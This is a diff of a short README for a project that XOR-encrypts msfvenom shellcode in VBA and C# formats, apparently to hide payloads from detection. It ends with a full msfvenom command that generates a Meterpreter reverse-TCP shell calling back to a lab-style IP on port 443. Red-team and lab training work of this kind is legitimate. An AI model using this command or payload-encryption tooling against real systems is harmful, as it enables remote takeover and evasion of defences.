giggi0x00/XOR_Payload_encryption/README.md

 # XOR_Payload_encryption
-This project is ment to be use as an encryptor shellcode produced by msfvenom for "-f vbapplication" and "-f csharp"
+This project is ment to be use as an encryptor shellcode produced by msfvenom for :

+"-f vbapplication"
+"-f csharp"

+it does automatically detect the payload format.

 ➜  ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.57 LPORT=443 EXITFUNC=thread -f vbapplication